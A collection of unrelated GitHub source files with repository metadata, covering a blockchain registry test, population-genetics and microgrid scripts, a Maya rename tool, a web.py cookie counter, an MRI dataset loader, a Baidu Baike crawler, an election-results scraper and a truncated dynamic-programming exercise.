pairings[coin_a].add(coin_b)
pairings[coin_b].add(coin_a)
for coin in pairings.keys():
coin_swap_count = len(pairings[coin])
available_swaps = {
registry.get_coin_swap_complement(coin, i) for i in range(coin_swap_count)
}
assert available_swaps == {ZERO_ADDRESS}
| curvefi/curve-pool-registry | tests/local/unitary/Registry/test_remove_pool_lending.py | test_remove_pool_lending.py | py | 4,686 | python | en | code | 169 | github-code | 36 | [
{
"api_name": "scripts.utils.pack_values",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "scripts.utils.pack_values",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "pytest.fixture",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "py... |
6262380149 | import os,sys,re
import slide_window
import vcf_operating
import read_group
import read_dict
from multiprocessing import Pool
#https://github.com/mfumagalli/ngsPopGen/blob/9ee3a6d5e733c1e248e81bfc21514b0527da967b/scripts/getDxy.pl
def help():
print("python3 xx.py vcf two_group_list fasta_fai outfile window step")
print("two_group_list: classA\tHH1\nclassB\tHH2\nclassB\tHH3")
sys.exit()
def maf_1_0(list_):
count_0=sum([x.count('0') for x in list_])
count_1=sum([x.count('1') for x in list_])
all_count=count_0+count_1
if all_count==0:
return [0,0]
maf_1=count_1/all_count
maf_0=count_0/all_count
return [maf_0,maf_1]
def each_maf(line):
types1=[line[x][:3] for x in loci1]
types2=[line[x][:3] for x in loci2]
all_maf=maf_1_0(types1)+maf_1_0(types2)
return all_maf
def each_dxy(line_):
line=line_.split()
chr_,pos=line[0],int(line[1])
all_maf=each_maf(line)
dxy=all_maf[0]*all_maf[3]+all_maf[1]*all_maf[2]
return [chr_,pos,dxy]
def every_dxy(vcfs):
head=next(vcfs).split()
global loci1,loci2
loci1=[head.index(x) for x in group_dict[group1]]
loci2=[head.index(x) for x in group_dict[group2]]
po1=Pool(theads)
all_dxy=po1.map(each_dxy,vcfs)
po1.close()
dxy_dict={}
for list_ in all_dxy:
if list_[2]==0:
continue
dxy_dict.setdefault(list_[0],{}).setdefault(list_[1],list_[2])
return dxy_dict
def window_dxy(cal_window):
chr_=cal_window[0]
if chr_ not in dxy_snp_pos_dict:
return
chr_snp_pos=dxy_snp_pos_dict[chr_]
N_SNP,ALL_DXY=0,0
for pos in chr_snp_pos:
if pos<cal_window[1]:
continue
elif cal_window[1]<=pos<=cal_window[2]:
N_SNP+=1
ALL_DXY+=dxy_dict[chr_][pos]
elif pos >cal_window[2]:
break
if ALL_DXY==0 or N_SNP==0:
return
ALL_DXY=ALL_DXY/(cal_window[2]-cal_window[1]+1)
return [cal_window[0],str(cal_window[1]),str(cal_window[2]),str(N_SNP),str(ALL_DXY)]
def write_result(all_window_dxy,out_file):
all_window_dxy.sort(key=lambda x:(x[0],int(x[1])))
with open(out_file,'w') as fp:
print('CHROM\tSTART\tEND\tN_SNP\tDXY',file=fp)
for win in all_window_dxy:
print('\t'.join(win),file=fp)
def main(vcf_file,group_file,fasta_fai,out_file,window,step):
global group_dict,group1,group2
group_dict=read_group.Read_group1(group_file)
[group1,group2]=list(group_dict.keys())
vcfs=For_vcf.vcf_read2(vcf_file)
global dxy_dict,dxy_snp_pos_dict
dxy_dict=every_dxy(vcfs)
dxy_snp_pos_dict={}
for chr_ in dxy_dict:
dxy_snp_pos_dict[chr_]=sorted(dxy_dict[chr_].keys())
chr_len_dict=read_dict.read_fai(fasta_fai)
all_windows=[]
#[[chr,start,end]]
for chr_ in chr_len_dict:
all_windows+=slide_window.slide_window2(chr_,window,step,1,chr_len_dict[chr_])
po2=Pool(theads)
all_window_dxy=po2.map(window_dxy,all_windows)
po2.close()
#all_window_dxy=list(filter(None,all_window_dxy))
all_window_dxy=[x for x in all_window_dxy if x !=None]
write_result(all_window_dxy,out_file)
if __name__=="__main__":
try:
[vcf_file,group_file,fasta_fai,out_file]=sys.argv[1:5]
window=int(sys.argv[5])
step=int(sys.argv[6])
except:
help()
theads=30
For_vcf=vcf_operating.for_vcf()
main(vcf_file,group_file,fasta_fai,out_file,window,step)
| ZJin2021/SCRIPT_ostrya | script/Population_Genetics/dxy.py | dxy.py | py | 3,460 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.exit",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pool",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "read_group.Read_group1",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "read_dict.read_f... |
14017937824 | import maya.cmds as cmds
from functools import partial
def rename_sl(*args):
new_name = cmds.textField('Rename', q = True, text =True)
items = cmds.ls(sl=True)
for item in items:
cmds.rename(item , new_name)
def replace_sl(*args):
name_to_replace = cmds.textField('RePlace_before', q = True, text =True)
replace_name = cmds.textField('RePlace_after', q = True, text =True)
items = cmds.ls(sl=True)
for item in items:
new_name = item.replace(name_to_replace, replace_name)
cmds.rename(item , new_name)
def rename_sl_ui():
'''
main rondom copy function
'''
cmds.window()
cmds.columnLayout()
cmds.rowLayout(nc=3)
cmds.text(label='input')
rename_input = cmds.textField('Rename', text='new_name', ed=True)
cmds.button(c=rename_sl, label='Rename')
cmds.setParent('..')
cmds.rowLayout(nc=5)
cmds.text(label='before')
cmds.textField('RePlace_before', text='name', ed=True)
cmds.text(label='after')
cmds.textField('RePlace_after', text='new_name', ed=True)
cmds.button(c=replace_sl, label='Replace')
cmds.setParent('..')
#name_button = cmds.textFieldButtonGrp('Rename',label='input', text='name',ed = True, buttonLabel='Rename', bc=rename_sl)
#name_button = cmds.textFieldButtonGrp('Replace',label='input', text='name',ed = True, buttonLabel='Replace', bc=rename_sl)
cmds.showWindow()
rename_sl_ui() | s-nako/MayaPythonTools | ModelingTools/name_change/rename_sl.py | rename_sl.py | py | 1,426 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "maya.cmds.textField",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "maya.cmds",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "maya.cmds.ls",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "maya.cmds",
"line_number"... |
72673433065 | import time
start_time = time.time()
from global_var import *
from demandSimulate import *
from oneStepOptimization_poly import *
from sklearn import preprocessing
from sklearn.linear_model import LinearRegression
from scipy.stats import qmc
def microgrid_poly2d():
# stock
alpha = 0.5; K0 = 0; sigma = 2; processType = "Regular";
# backward simulation
sampler = qmc.Sobol(d=2, scramble=False)
# 512 samples
W = sampler.random_base2(m=9)
X0 = -10 + 20*W[:,0]; # X0 in [-10,10]
ICord = 10*W[:,1]; # Ic in[0,Imax = 10]
ICord_rep = np.repeat(ICord,batch);
X0_rep = np.repeat(X0,batch);
demandMatrix = demandSimulate(alpha, K0, sigma, 1, nsim, dt, X0_rep);
# I0 is 5
finalCost = -200 * ((ICord_rep-5))*(ICord_rep<5)
# 20 rows, 512 columns,create 20x512 matrix, filled by column wise with order = "F" (default fill row),
# take row sum mean to get final cost for each starting site
finalCost = np.mean(finalCost.reshape((batch,sites),order = "F"),axis = 0)
costNext = np.zeros((sites,no_regime));
for r in range(no_regime):
costNext[:,r] = finalCost;
modelIndx = 0; Model = [None] * (nstep)
polyMdl = [None]*no_regime
for iStep in range(nstep,0,-1):
for r in range(no_regime):
polyMdl[r] = LinearRegression()
X_train = np.column_stack((X0, ICord))
poly = preprocessing.PolynomialFeatures(degree=3)
X_poly = poly.fit_transform(X_train)
y_train = costNext[:, r]
polyMdl[r].fit(X_poly, y_train)
print(iStep)
print(costNext[:10,0])
print("\n")
# generate X_t
demandMatrix = demandSimulate(alpha, K0, sigma, 1, nsim, dt, X0_rep);
# optimize basedd on X_t-1,I_t
cost, _, control, nextInventory, nextRegime, imbalance, batteryOutput =oneStepOptimization_microgrid(
demandMatrix[:, 1], ICord_rep, polyMdl)
for r in range(no_regime):
costNext[:, r] = np.mean(cost[:, r].reshape((batch, sites),order = "F"), axis=0)
Model[modelIndx] = polyMdl.copy();
modelIndx+=1;
# forward simulations
np.random.seed(10)
simOutSample = 2000;
X0 = np.zeros(simOutSample);
I0 = 5;
demandMatrix = demandSimulate(alpha, K0, sigma, nstep, simOutSample, maturity, X0);
inventoryForward = np.zeros((simOutSample,nstep+1));
inventoryForward[:, 0] = I0
regimeForward = np.zeros((simOutSample, nstep + 1))
regimeForward[:, 0] = 0
Bt = np.zeros((simOutSample, nstep))
St = np.zeros((simOutSample, nstep))
dieselPower = np.zeros((simOutSample, nstep))
trueCost = np.zeros((simOutSample, nstep))
artificialCost = np.zeros((simOutSample, nstep))
costForward = np.zeros((simOutSample, nstep + 1))
for iStep in range(nstep):
_, _, control, nextInventory, nextRegime, imbalance, batteryOutput = \
oneStepOptimization_microgrid(demandMatrix[:, iStep], inventoryForward[:, iStep], Model[nstep - iStep-1])
row_idx = tuple(np.arange(0,simOutSample))
col_idx = tuple(np.int64(regimeForward[:,iStep]))
inventoryForward[:, iStep + 1] = nextInventory[row_idx,col_idx]
regimeForward[:, iStep + 1] = nextRegime[row_idx,col_idx]
Bt[:, iStep] = batteryOutput[row_idx,col_idx]
St[:, iStep] = imbalance[row_idx,col_idx]
dieselPower[:, iStep] = control[row_idx,col_idx]
trueCost[:, iStep] = k[0] * (dieselPower[:, iStep] ** 0.9) * dt + switchCost * (regimeForward[:, iStep + 1] > regimeForward[:, iStep])
artificialCost[:, iStep] = k[1] * St[:, iStep] * (St[:, iStep] > 0) * dt - k[2] * St[:, iStep] * (St[:, iStep] < 0) * dt
penalty = -200 * (inventoryForward[:, -1] - I0) * (inventoryForward[:, -1] < I0)
costForward = trueCost + artificialCost
pathWiseCost = np.sum(costForward, axis=1) + penalty
totalCost = np.mean(pathWiseCost)
stdDeviation = np.std(pathWiseCost) / np.sqrt(simOutSample)
totalTrueCost = np.mean(np.sum(trueCost, axis=1))
totalArtificialCost = np.mean(np.sum(artificialCost, axis=1))
print(f'nsim: {sites} x {batch}, regime=1, totalCost= {totalCost}, totalTrueCost= {totalTrueCost}, totalArtificialCost= {totalArtificialCost}')
if __name__ == "__main__":
microgrid_poly2d()
print(f'Running time: {time.time()- start_time} s') | thihaa2019/WindEnergy | Aditya(Python)/microgrid_poly2d.py | microgrid_poly2d.py | py | 4,451 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "scipy.stats.qmc.Sobol",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "scipy.stats.qmc",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "sklearn.linear_model.L... |
23343506239 | """
NOMBRE: Maria del Carmen Hernandez Diaz
ACCOUNT: 1718110389
GROUP: TIC 51
DATE: 30-05-2020
DESCRIPTION: Creación de cookies con nombre, número de visitas, fecha, y hora del visitante.
En caso de que no haya nombre como respuesta del usuario se marcara como 'Anónimo'.
"""
import web # Librería de web.py
import datetime # Librería para manipulación de fecha y tiempo.
class Visitas:
def GET(self, name):
try:
# Administración Cookies
cookie = web.cookies()
visitas = "0"
print(cookie)
# Creación de variables para manejo accesible del tiempo.
date = datetime.datetime.now()
dateV = date.strftime('%a, %d-%m-%Y') # Estructura. (Dia de la semana, dia en numero-mes-año)
hourV = date.strftime('%H:%M:%S') # Estructura. (Hora:Mes:Segundos)
# Date - Visitor.
if dateV:
web.setcookie("dateV", dateV, expires="", domain=None)
else:
web.setcookie("dateV", dateV, expires ="", domain=None)
# Hour - Visitor.
if hourV:
web.setcookie("hourV", hourV, expires="", domain=None)
else:
web.setcookie("hourV", hourV, expires ="", domain=None)
# Name - Visitor.
if name:
web.setcookie("nombre", name, expires="", domain=None)
else:
name="Anónimo" # Asignacion en caso de que no haya un nombre introducido por un usuario.
web.setcookie("nombre", name, expires ="", domain=None)
# No. Visitas
if cookie.get("visitas"):
visitas = int(cookie.get("visitas"))
visitas += 1 # Contador de visitas
web.setcookie("visitas", str(visitas), expires ="", domain=None)
else:
web.setcookie("visitas", str(1), expires ="", domain=None)
visitas = "1"
# Retorno de variables en cadena (str), con saltos de linea para mejor visualizacion.
return "Bienvenido." + "\n" + "\n" + "Nombre: " + str(name) + "\n" + "No. Visitas: " + str(visitas) + "\n" + "Fecha visita: " + str(dateV) + "\n" + "Hora visita: " + str(hourV)
except Exception as e:
return "Error" + str(e.args) # En caso de error. | CarmenKaplanB/awi40 | semana_3/mvc/controllers/visitas.py | visitas.py | py | 2,221 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "web.cookies",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "web.setcooki... |
31124460363 | import os
import torch
import numpy as np
from torch.utils.data import Dataset
import h5py
class DataSet(Dataset):
def __init__(self, transform, split='train'):
self.image_list = []
self.transform = transform
file_list_path = os.path.join('dataset', split + '.list')
with open(file_list_path, 'r') as f:
for line in f:
self.image_list.append(os.path.join('dataset', os.path.join(line.strip(), 'mri_norm2.h5')))
def __len__(self):
return len(self.image_list)
def __getitem__(self, index):
content = h5py.File(self.image_list[index], 'r')
image = content['image'][:]
label = content['label'][:]
sample = {'image': image, 'label': label}
if self.transform:
sample = self.transform(sample)
return sample
class RandomCrop(object):
def __init__(self, output_size):
self.output_size = output_size
def __call__(self, sample):
image, label = sample['image'], sample['label']
w, h, d = image.shape
if w <= self.output_size[0] or h <= self.output_size[1] or d <= self.output_size[2]:
pw = (self.output_size[0] - w) // 2 + 3
ph = (self.output_size[1] - h) // 2 + 3
pd = (self.output_size[2] - d) // 2 + 3
image = np.pad(image, ((pw, pw), (ph, ph), (pd, pd)), 'constant', constant_values=0)
label = np.pad(label, ((pw, pw), (ph, ph), (pd, pd)), 'constant', constant_values=0)
w, h, d = image.shape
w1 = np.random.randint(0, w - self.output_size[0])
h1 = np.random.randint(0, h - self.output_size[1])
d1 = np.random.randint(0, d - self.output_size[2])
image = image[w1:w1 + self.output_size[0], h1:h1 + self.output_size[1], d1:d1 + self.output_size[2]]
label = label[w1:w1 + self.output_size[0], h1:h1 + self.output_size[1], d1:d1 + self.output_size[2]]
return {'image': image, 'label': label}
class RandomRotFlip(object):
def __call__(self, sample):
image, label = sample['image'], sample['label']
k = np.random.randint(0, 4)
image = np.rot90(image, k)
label = np.rot90(label, k)
axis = np.random.randint(0, 2)
image = np.flip(image, axis).copy()
label = np.flip(label, axis).copy()
return {'image': image, 'label': label}
class ToTensor(object):
def __call__(self, sample):
image = sample['image']
image = image.reshape(1, image.shape[0], image.shape[1], image.shape[2]).astype(np.float32)
image = torch.from_numpy(image)
label = torch.from_numpy(sample['label']).long()
return {'image': image, 'label': label}
| yeshunlong/Reproduce | UA-MT/dataset.py | dataset.py | py | 2,746 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
... |
9366664262 | #coding=utf-8
import json
import queue
import random
import re
import time
import traceback
import urllib
import urllib.request
import uuid
import requests
import wipe_off_html_tag
from bs4 import BeautifulSoup
import data_storager
class ParentChild(object):
def __init__(self):
self._parent_id = None
self._parent_title = None
self._parent_url = None
self._parent_layer = None
self._child_id = None
self._child_title = None
self._child_url = None
self._child_layer = None
class Spider(object):
"""
layer:第一层,首页, 科学百科
第二层,航空航天
第三层,3·8马来西亚航班失踪事件
第四层,马来西亚航空公司
第h层
"""
def __init__(self):
self._post_lemmas_url = 'https://baike.baidu.com/wikitag/api/getlemmas'
self._get_zhixin_url = 'https://baike.baidu.com/wikiui/api/zhixinmap?lemmaId='
self._get_guess_like_url = 'https://baike.baidu.com/api/wikiui/guesslike?url='
self._parent_childs = queue.Queue() # relationship队列
self._crawl_layers = 4-1 # 需要爬取的最后一层的上一层
def execute(self):
# 录入首页,科学百科
root_url = 'https://baike.baidu.com/science'
root_title = r'科学百科'
root_id = str(uuid.uuid3(uuid.NAMESPACE_DNS, str(root_url)))
# data_storager.insert_webpage(root_id, root_title, root_url, None)
# print("wxm entity:", root_title, root_url)
# 录入首页下二级页面
first_page_html = self.get_firstpage_content("https://baike.baidu.com/science")
first_page_urls = self.get_firstpage_url(first_page_html) # 10条二级页面信息
tag_ids = self.get_firstpage_tagid(first_page_urls) # 9条二级页面信息
first_page_urls_slice = first_page_urls[1:2] # 获取前半部分URL
tag_ids_slice = tag_ids[1:2] # 获取前半部分Tag
for page_id in range(0, 61):
try:
for i in range(0, len(tag_ids_slice)):
# 处理每一个二级页面,如航空航天,天文学,环境生态
print("page_id:" + str(page_id) + ", tagids:" + str(tag_ids_slice[i]))
time.sleep(random.choice(range(1, 3)))
title = first_page_urls_slice[i].get_text()
url = first_page_urls_slice[i].get('href')
id = str(uuid.uuid3(uuid.NAMESPACE_DNS, str(url))) # 为当前网页生成UUID
data_storager.insert_relationship(root_id, root_title, id, title) # 插入首页与二级页面的relationship,如<科学百科_id, 航空航天_id>
data_storager.insert_webpage(id, title, url, None) # 插入二级页面webpage信息,页面内容为空,如航空航天
print("wxm entity:",title, url)
# 录入所有的<二级页面,三级页面>配对信息到缓存中,如航空航天下面的当前page_id下的所有条目,如马航,911事件
self.get_second_page_url(id, title, url, tag_ids_slice[i], page_id)
while (self._parent_childs): # 从第三层(马航,911事件,位于缓存对象的child_xx中)开始,处理队列每一个页面
pc = self._parent_childs.get(0)
self.deal_with_child_webpage(pc) # 用layer控制爬虫爬取深度,调用deal_with_child_webpage方法即插入数据库
except:
print(traceback.format_exc())
print("wxmException,page_id:" + str(page_id))
print("wxmmmmmmmmmmmmmm, tag_ids_slice:" + str(tag_ids_slice[i]))
print("wxmmmmmmmmmmmmmm, page_id:" + str(page_id))
def deal_with_child_webpage(self, pc):
""" 处理当前缓存队列中的对象中的child对象,该方法始终以child为中心处理,parent在前面处理了;从第三层开始的 """
try:
htmL_content = self.get_sub_page_content(pc._child_url) # 获取当前孩子页面的html内容
if htmL_content == None:
return
real_content = self.get_web_real_content(htmL_content) # 获取网页的真正需要入库的content
if len(real_content)>100 and real_content!=None:
real_content=real_content[:100]
data_storager.insert_relationship(pc._parent_id, pc._parent_title, pc._child_id, pc._child_title) # 插入二级页面与三级页面的relationship,如<航空航天_id, 马航_id>
data_storager.insert_webpage(pc._child_id, pc._child_title, pc._child_url, real_content) # 插入当前孩子页面信息,如马航 todo, 解析出htmlcontent中汉字
print("wxm entity:",pc._child_title, pc._child_url)
self.batch_insert_webpage_attributes(pc._child_id, pc._child_title, htmL_content) # 插入当前页面的所有属性信息,如马航下的中文名 3·8马来西亚航班失踪事件
self._crawl_layers = random.choice(range(3, 7))
if pc._child_layer <= self._crawl_layers: # 3<=4,仅从第三层爬到第四层
self.get_sub_urls(pc._child_id, pc._child_title, pc._child_url, pc._child_layer, htmL_content) # 获取当前网页下所有连接,传入第三层的id,title,url,获取第四层信息,加入到缓存队列中
except:
print(traceback.format_exc())
print("wxmException, ", pc._child_id, pc._child_title, pc._child_url)
def batch_insert_webpage_attributes(self, id, title, htmL_content):
soup_findattribute = BeautifulSoup(htmL_content, 'html.parser')
data_findattribute = soup_findattribute.find_all('div', {'class': 'basic-info cmn-clearfix'})
for attributes in data_findattribute:
attribute_names = attributes.find_all('dt', {'class': 'basicInfo-item name'})
names_list = []
for a in attribute_names:
attribute_name = a.get_text()
names_list.append(attribute_name)
attribute_values = attributes.find_all('dd', {'class': 'basicInfo-item value'})
values_list = []
for b in attribute_values:
attributes_value = b.get_text()
values_list.append(attributes_value)
nvs = zip(names_list, values_list)
nvDict = dict((str(names_list), str(values_list)) for names_list, values_list in nvs)
for names_lists, values_lists in nvDict.items():
names_lists_insert = names_lists
value_lists_insert = values_lists.strip("\n")
data_storager.insert_attributes(id, title, names_lists_insert, value_lists_insert)
def get_web_real_content(self, htmL_content):
soup = BeautifulSoup(htmL_content, 'html.parser')
main_content = soup.find('div', {'class': 'main-content'})
return wipe_off_html_tag.filter_tags(str(main_content)).strip(r'收藏\n查看我的收藏\n').\
strip(r'有用+1\n已投票\n').strip(r'编辑\n锁定\n').strip(r'审核\n。')
def get_sub_urls(self, id, title, url, layer, content):
soup = BeautifulSoup(content, 'html.parser')
body = soup.body # 获取body部分
# 爬取para中连接词条
try:
link_list1 = {}
link_body1 = body.find_all('div', {'class': 'para', 'label-module': "para"})
for link_body in link_body1:
result_list = link_body.find_all('a', {'target': '_blank'})
if result_list:
for link in result_list:
fourth_page_url_postfix = link.get('href')
pattern = re.compile(r'/pic')
match = pattern.match(fourth_page_url_postfix)
if not match:
sub_title = link.get_text()
sub_url = "http://baike.baidu.com" + fourth_page_url_postfix
link_list1[sub_title] = sub_url
except:
print(traceback.format_exc())
print("wxmException, 爬取para中连接词条 todo print 出错更详细信息:" + id + ", " + title + ", " + url)
# 爬取相关信息词条
try:
link_list2 = {}
link_body2 = body.find('div', {'class': 'zhixin-box'})
newlemmaid = link_body2['data-newlemmaid']
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36'
}
data = {"lemmaId": newlemmaid}
request_url = self._get_zhixin_url + str(newlemmaid)
content = requests.get(request_url, params=data, headers=headers).content
response = content.decode('unicode-escape').replace("\/", "/")
js = json.loads(response)
for i in range(len(js)):
title_urls = js[i]['data']
for j in range(len(title_urls)):
sub_title = js[i]['data'][j]['title']
sub_url = js[i]['data'][j]['url']
link_list2[sub_title] = sub_url
except:
print(traceback.format_exc())
print("wxmException, 爬取相关信息词条 todo print 出错更详细信息:" + id + ", " + title + ", " + url)
# 爬取猜你喜欢词条
try:
link_list3 = {}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36'
}
data = {
"url": sub_url,
"lemmaTitle": sub_title,
"eid": 202
}
request_url = self._get_guess_like_url + str(sub_url) + "&lemmaTitle=" + sub_title + "&eid=202"
content = requests.get(request_url, params=data, headers=headers).content
try:
jso1 = json.loads(content)
ad_place_data = jso1["ad_place_list"][0]["ad_place_data"]
ad_place_data2 = ad_place_data.replace("\/", "/")
jso2 = json.loads(ad_place_data2)
ads = jso2["ads"]
for ad in ads:
sub_title = ad['title']
sub_url = ad['url']
link_list3[sub_title] = sub_url
except:
print(traceback.format_exc())
print("wxmException, 爬取猜你喜欢词条 json 解析失败")
except:
print(traceback.format_exc())
print("wxmException, 爬取猜你喜欢词条 todo print 出错更详细信息:" + id + ", " + title + ", " + url)
try:
dictMerged2 = {}
dictMerged1 = dict(link_list1, **link_list2)
dictMerged2 = dict(dictMerged1, **link_list3)
except:
print(traceback.format_exc())
print("wxmException, 合并dict失败")
for sub_title, sub_url in dictMerged2.items():
pc = ParentChild()
pc._parent_id = id
pc._parent_title = title
pc._parent_url = url
pc._parent_layer = layer
child_id = str(uuid.uuid3(uuid.NAMESPACE_DNS, str(sub_url))) # 为当前孩子页面生成UUID
pc._child_id = child_id
pc._child_title = sub_title
pc._child_url = sub_url
pc._child_layer = pc._parent_layer + 1
self._parent_childs.put(pc)
def get_sub_page_content(self, url3, data=None):
header = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate,sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'
}
timeout = 180
try:
result2 = requests.get(url3, headers=header, timeout=timeout)
result2.encoding = 'utf-8'
return result2.text
except urllib.request.HTTPError as e:
print(traceback.format_exc())
print('wxmException, 1:', e.code)
except urllib.request.URLError as e:
print(traceback.format_exc())
print('wxmException, 2:', e.reason)
except:
print(traceback.format_exc())
print('wxmException, 0')
return None
def get_second_page_url(self, id, title, url, tagId, page):
"""
父亲id是传入的,孩子id是生成的
"""
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36'
}
data = {
"limit": "24",
"timeout": 3000,
"filterTags": [],
"tagId": tagId,
"fromLemma": False,
"contentLength": 40,
"page": page
}
try:
content = requests.post(self._post_lemmas_url, data=data, headers=headers).content
response = content.decode('unicode-escape').replace("\/", "/")
js = json.loads(response)
for i in range(len(js['lemmaList'])):
sub_title = (js['lemmaList'][i]['lemmaTitle'])
sub_url = (js['lemmaList'][i]['lemmaUrl'])
pc = ParentChild()
pc._parent_id = id
pc._parent_title = title
pc._parent_url = url
pc._parent_layer = 2
child_id = str(uuid.uuid3(uuid.NAMESPACE_DNS, str(sub_url))) # 为当前孩子页面生成UUID
pc._child_id = child_id
pc._child_title = sub_title
pc._child_url = sub_url
pc._child_layer = 3
self._parent_childs.put(pc)
except:
print(traceback.format_exc())
print("wxmException, ", id, title, url, tagId, page) # todo 描述
def get_firstpage_content(self, url, data=None):
header = {
'Accept': 'text/css,*/*;q=0.1',
'Accept-Encoding': 'gzip,deflate,sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'
}
timeout = random.choice(range(80, 180))
while True:
try:
rep = requests.get(url, headers=header, timeout=timeout)
rep.encoding = 'utf-8'
req = urllib.request.Request(url, data, header)
response = urllib.request.urlopen(req, timeout=timeout)
response.close()
break
except urllib.request.HTTPError as e:
print(traceback.format_exc())
print('wxmException, 1:', e)
time.sleep(random.choice(range(1,3)))
except urllib.request.URLError as e:
print(traceback.format_exc())
print('wxmException, 2:', e)
time.sleep(random.choice(range(1,3)))
except:
print(traceback.format_exc())
print('wxmException 0')
return rep.text
def get_firstpage_url(self, html):
bs = BeautifulSoup(html, "html.parser")
body = bs.body # 获取body部分
data = body.find_all('div', {'class': 'category-info'}) # 找到id为7d的div
urls_list = []
for a in data:
ul = a.find('h5')
url = ul.find('a')
urls_list.append(url)
return urls_list
def get_firstpage_tagid(self, first_page_urls):
links_list = []
for i in first_page_urls:
links = i.get('href')
links_list.append(links)
tagid_list = []
for b in links_list:
tagid = b[46:51]
tagid_list.append(tagid)
# 这里可以del 多个first_page_urls,将其分成多部分,供两台机器一起跑
# 可以用切片,将tagid_list选择出对应的部分来
del first_page_urls[0]
del tagid_list[0]
return tagid_list # 检测出返回值最好跟你要输出的内容保持一直,出错率比较低
if __name__ == '__main__':
spider = Spider()
spider.execute() | ChandlerBang/Movie-QA-System | jw/spider.py | spider.py | py | 17,068 | python | en | code | 58 | github-code | 36 | [
{
"api_name": "queue.Queue",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "uuid.uuid3",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "uuid.NAMESPACE_DNS",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "time.sleep",
"line... |
19270176336 | #!C:\Users\Bhavya Mulpuri\AppData\Local\Programs\Python\Python36-32\python.exe
import requests
from bs4 import BeautifulSoup
import cgi, cgitb
import csv
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
print("Content-Type:text/html\r\n\r\n")
cgitb.enable();
form = cgi.FieldStorage();
state = "S29";""" form["s1"].value"""
constituency = "82" ;"""form["s2"].value"""
url = "http://eciresults.nic.in/Constituencywise" + state + constituency + ".htm?ac=" + constituency;
print(url);
page = requests.get(url);
soup = BeautifulSoup(page.content, 'html.parser');
table = soup.find('table', border="1");
t_rows = table.find_all('tr', style="font-size:12px;");
result = [];
with open('data.csv', 'w') as f:
for row in t_rows:
result = row.find_all('td');
# print("<p>%s%s%s</p>" %(result[0].text.strip(),result[1].text.strip(),result[2].text.strip()));
data_writer = csv.writer(f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL);
data_writer.writerow(
['%s' % (result[0].text.strip()), '%s' % (result[1].text.strip()), '%s' % (result[2].text.strip())]);
var = [];
x_axis = [];
y_axis = [];
z_axis = [];
with open('data.csv', 'r') as f:
var = csv.reader(f, delimiter=",");
for i in var:
if len(i) is not 0:
x_axis.append(i[0]);
y_axis.append(i[1]);
z_axis.append(int(i[2]));
fig = plt.figure()
plt.bar(x_axis, z_axis, width=0.8, color=['red', 'green', 'pink', 'blue', 'black'])
for i,v in enumerate(z_axis):
plt.text(x_axis[i] ,v ,str(v),horizontalalignment = 'center',fontsize =10);
plt.xlabel('candidates');
plt.ylabel('number of votes');
plt.title('Constituencywise result Data Visualization');
num=np.arange(len(x_axis));
plt.xticks(num,x_axis,fontsize=6,rotation=30);
plt.show();
plt.savefig('C:/xampp/htdocs/plot.pdf');
| bhavyamulpuri/DADV | Scrapping.py | Scrapping.py | py | 1,956 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cgitb.enable",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cgi.FieldStorage",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"l... |
12814337666 | # 금광 / p375 / DP
# # 내가 푼 방법
from collections import deque
T = int(input())
dx = [-1,0,1] # 왼위, 왼, 왼아래
dy = [-1,-1,-1]
for i in range(T):
queue = deque()
n,m = map(int,input().split())
data = [[] for i in range(n)]
str = list(map(int,input().split()))
for i in range(n):
for j in range(m):
data[i].append(str[(i*m) + j])
answer = [[0 for _ in range(m)] for _ in range(n)]
for i in range(n):
